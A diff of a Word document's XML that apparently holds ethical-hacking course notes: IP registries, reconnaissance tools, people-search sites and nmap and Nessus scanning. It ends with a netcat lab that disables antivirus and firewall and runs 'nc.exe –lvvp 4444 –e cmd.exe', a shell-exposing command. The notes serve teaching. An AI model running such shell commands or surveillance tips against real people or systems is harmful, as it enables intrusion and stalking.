+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> 5 sub- organisations of IANA. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>These sub divisions are called as RIR(s</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>)[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Regional internet registry]. The different subdivisions and the areas covered is given in the picture given below.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -7805,7 +8407,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId102"/>
+                    <a:blip r:embed="rId101"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -7829,12 +8431,44 @@
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Now these RIR(s) in turn assigns a range of IP(s) to different registered LIR(s) [Local Internet Registry]. These LIR(S) are nothing but your ISP(s) [Internet Service Providers]. Examples of ISP(S) are ACTFiber net, Tata Communications, BSNL etc. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Let the see the responsibilities of each organisation, LIR is responsible for giving an unique IP address to each of their registered customers and also should log the data of the user. While the RIR and LIR has similar responsibility i.e allocation of IP to their sub organisations and maintain records. Any violation of the specified rules will </w:t>
+        <w:t xml:space="preserve">Now these RIR(s) in turn assigns a range of IP(s) to different registered LIR(s) [Local Internet Registry]. These LIR(S) are nothing but </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>your</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ISP(s) [Internet Service Providers]. Examples of ISP(S) are </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ACTFiber</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> net, Tata Communications, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>BSNL</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> etc. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Let the see the responsibilities of each organisation, LIR is responsible for giving an unique IP address to each of their registered customers and also should log the data of the user. While the RIR and LIR has similar responsibility </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i.e</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> allocation of IP to their sub organisations and maintain records. Any violation of the specified rules will </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">put </w:t>
@@ -7859,8 +8493,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>And websites like Pipl.com and anywho.com can used to find few of the personal details .</w:t>
-      </w:r>
+        <w:t xml:space="preserve">And websites like Pipl.com and anywho.com can used to find few of the personal </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>details .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p/>
     <w:p/>
@@ -7973,12 +8612,38 @@
         <w:t xml:space="preserve">We can use any possible way to </w:t>
       </w:r>
       <w:r>
-        <w:t>gather the information required. Either it may physically following someone or using passive means like following over the social media or using networking tools .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">Now in the case of networking we have few tools such as ipconfig, ping, nslookup , tracert and few other tools over the network. </w:t>
+        <w:t xml:space="preserve">gather the information required. Either it may physically following someone or using passive means like following over the social media or using networking </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>tools .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Now in the case of networking we have few tools such as ipconfig, ping, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>nslookup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>tracert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and few other tools over the network. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8014,7 +8679,7 @@
       <w:r>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:hyperlink r:id="rId103" w:tooltip="Internet Protocol" w:history="1">
+      <w:hyperlink r:id="rId102" w:tooltip="Internet Protocol" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8057,7 +8722,7 @@
       <w:r>
         <w:t xml:space="preserve">uration) in </w:t>
       </w:r>
-      <w:hyperlink r:id="rId104" w:tooltip="Microsoft Windows" w:history="1">
+      <w:hyperlink r:id="rId103" w:tooltip="Microsoft Windows" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8068,7 +8733,7 @@
       <w:r>
         <w:t xml:space="preserve"> is a </w:t>
       </w:r>
-      <w:hyperlink r:id="rId105" w:tooltip="Console application" w:history="1">
+      <w:hyperlink r:id="rId104" w:tooltip="Console application" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8079,7 +8744,7 @@
       <w:r>
         <w:t xml:space="preserve"> that displays all current </w:t>
       </w:r>
-      <w:hyperlink r:id="rId106" w:tooltip="TCP/IP" w:history="1">
+      <w:hyperlink r:id="rId105" w:tooltip="TCP/IP" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8090,7 +8755,7 @@
       <w:r>
         <w:t xml:space="preserve"> network configuration values and can modify </w:t>
       </w:r>
-      <w:hyperlink r:id="rId107" w:tooltip="Dynamic Host Configuration Protocol" w:history="1">
+      <w:hyperlink r:id="rId106" w:tooltip="Dynamic Host Configuration Protocol" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8101,7 +8766,7 @@
       <w:r>
         <w:t xml:space="preserve"> (DHCP) and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId108" w:tooltip="Domain Name System" w:history="1">
+      <w:hyperlink r:id="rId107" w:tooltip="Domain Name System" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8126,17 +8791,38 @@
         <w:t xml:space="preserve">Ping – </w:t>
       </w:r>
       <w:r>
-        <w:t>Allows you to send a signal to another device on the network to see if it is active .</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>How does it work?: uses ICMP to send out an “echo request” to the destination device and gets back “echo response”  if the destination device is ACTIVE</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ping –t  :: until stopped sends the packets.</w:t>
+        <w:t xml:space="preserve">Allows you to send a signal to another device on the network to see if it is </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>active .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>How does it work</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>?:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> uses ICMP to send out an “echo request” to the destination device and gets back “echo response”  if the destination device is ACTIVE</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ping –</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>t  :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>: until stopped sends the packets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8146,48 +8832,130 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Ping –n count:: number of echo request to send.</w:t>
+        <w:t>Ping –n count</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>::</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> number of echo request to send.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Tracert(in windows)/traceroute( in liux)- </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Tracert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">in windows)/traceroute( in </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>liux</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">)- </w:t>
       </w:r>
       <w:r>
         <w:t>It lets you see step by step route a packet takes to the destination you specify.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Tarcert –h maxhoops</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Tracert –w timeout</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Tracert –R :: trace round trip time</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tarcert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –h </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>maxhoops</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tracert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –w timeout</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Tracert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>R :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>: trace round trip time</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p/>
     <w:p/>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">Nslookup- </w:t>
-      </w:r>
-      <w:r>
-        <w:t>This command will fetch the DNS records for a given domain name or IP address. Remember the IP address and domain names are stored in DNS server, so the nslookup command lets you query the DNS records to gather information.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Nslookup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">This command will fetch the DNS records for a given domain name or IP address. Remember the IP address and domain names are stored in DNS server, so the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nslookup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> command lets you query the DNS records to gather information.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8197,27 +8965,55 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>A – associated names to IP.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Cname – canonical names.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Mx – mail exchange.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Ptr – point to record.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Loc – location</w:t>
+        <w:t xml:space="preserve">A – </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>associated</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> names to IP.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Cname</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – canonical names.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Mx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – mail exchange.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ptr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – point to record.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Loc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – location</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8226,8 +9022,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Rp – responsible person</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Rp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> – responsible person</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -8243,11 +9044,19 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Httrack –</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Httrack</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> This tool can be used to clone the websites.</w:t>
@@ -8283,11 +9092,19 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Nmap-</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> This needs to be installed if in windows and does not require installation in kali.</w:t>
@@ -8300,12 +9117,20 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Detail description of all the types of nmap scans are given the website:</w:t>
+        <w:t xml:space="preserve">Detail description of all the types of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> scans are given the website:</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:hyperlink r:id="rId109" w:history="1">
+      <w:hyperlink r:id="rId108" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8316,17 +9141,62 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>But here are few that are most frequently used :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>For finding out the target systems ip address use- nmap –O target Ip/address.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Or use nmap –O –PN target to find the systems os without pinging the system. This is use full when the target system has a fire wall installed.</w:t>
+        <w:t xml:space="preserve">But here are few that are most frequently </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>used :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">For finding out the target systems </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> address use- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –O target </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/address.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Or use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> –O –PN target to find the systems </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> without pinging the system. This is use full when the target system has a fire wall installed.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8339,7 +9209,35 @@
         <w:rPr>
           <w:rFonts w:eastAsia="Times New Roman"/>
         </w:rPr>
-        <w:t>TCP connect() scan (-sT)</w:t>
+        <w:t xml:space="preserve">TCP </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman"/>
+        </w:rPr>
+        <w:t>connect(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman"/>
+        </w:rPr>
+        <w:t>) scan (-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman"/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8352,7 +9250,15 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:t>This the default scanning technique used, if and only if the SYN scan is not an option, because the SYN scan requires root privilege. Unlike the TCP SYN scan, it completes the normal TCP three way handshake process and requires the system to call connect(), which is a part of the operating system. Keep in mind that this technique is only applicable to find out the TCP ports, not the UDP ports.</w:t>
+        <w:t xml:space="preserve">This the default scanning technique used, if and only if the SYN scan is not an option, because the SYN scan requires root privilege. Unlike the TCP SYN scan, it completes the normal TCP three way handshake process and requires the system to call </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>connect(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>), which is a part of the operating system. Keep in mind that this technique is only applicable to find out the TCP ports, not the UDP ports.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8380,7 +9286,57 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t># nmap -sT 192.168.1.1</w:t>
+        <w:t xml:space="preserve"># </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sT</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 192.168.1.1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8403,7 +9359,7 @@
       <w:r>
         <w:t xml:space="preserve">To login we need to open the Nessus – This can be done by entering </w:t>
       </w:r>
-      <w:hyperlink r:id="rId110" w:anchor="/" w:history="1">
+      <w:hyperlink r:id="rId109" w:anchor="/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -8417,7 +9373,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">We need to give the target website address or a system ip to scan while creating a scan. And few types of scans require the credential of the system. </w:t>
+        <w:t xml:space="preserve">We need to give the target website address or a system </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to scan while creating a scan. And few types of scans require the credential of the system. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8426,11 +9390,19 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Accunetix-</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>Accunetix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> This is another corporate scanning tool that scans the target system for vulnerabilities.</w:t>
@@ -8447,8 +9419,13 @@
         <w:t xml:space="preserve"> This is internet packet analyser tool. This captures the packets from a given IP. The packets captured can be analysed </w:t>
       </w:r>
       <w:r>
-        <w:t>and can be useful for identifying what kind of data or if not what data the target IP is using (the data can be seen only if it is unencrypted )</w:t>
-      </w:r>
+        <w:t xml:space="preserve">and can be useful for identifying what kind of data or if not what data the target IP is using (the data can be seen only if it is </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>unencrypted )</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -8496,8 +9473,13 @@
           <w:numId w:val="20"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t>NVD(National Vulnerability DB)- This website contains all the details of the new vulnerabilities found in different software.</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>NVD(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>National Vulnerability DB)- This website contains all the details of the new vulnerabilities found in different software.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8508,8 +9490,29 @@
           <w:numId w:val="20"/>
         </w:numPr>
       </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">CVE(Common Vulnerability and Exposure)- This organisation is the one that finds the vulnerabilities in the software. The NVD is a Database that is maintained by NIST(National Institute of Standard and Security). The CVE has CNA( CVE numbering Authorities) which give a unique number to each vulnerability. The general format of the CVE number at this time is </w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CVE(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">Common Vulnerability and Exposure)- This organisation is the one that finds the vulnerabilities in the software. The NVD is a Database that is maintained by </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>NIST(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">National Institute of Standard and Security). The CVE has </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>CNA(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> CVE numbering Authorities) which give a unique number to each vulnerability. The general format of the CVE number at this time is </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8528,8 +9531,16 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>CVE-year-CVENumber</w:t>
-      </w:r>
+        <w:t>CVE-year-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:t>CVENumber</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8611,7 +9622,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Disable all the network security tools like your anti-virus , firewall and defender.</w:t>
+        <w:t>Disable all the network security tools like your anti-</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>virus ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> firewall and defender.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8623,7 +9642,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Now download netcat in both the systems.</w:t>
+        <w:t xml:space="preserve">Now download </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in both the systems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8635,7 +9662,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Open cmd as an administrator in both the systems.</w:t>
+        <w:t xml:space="preserve">Open </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> as an administrator in both the systems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8647,7 +9682,15 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>In both the system move to the folder/directory of netcat.</w:t>
+        <w:t xml:space="preserve">In both the system move to the folder/directory of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>netcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8665,13 +9708,43 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>nc.exe –lvvp 4444 –e cmd.exe</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">                                               The options l says listen, v says verbose and the p says port. The ‘4444’ in the above command is the port that we are o</w:t>
-      </w:r>
-      <w:r>
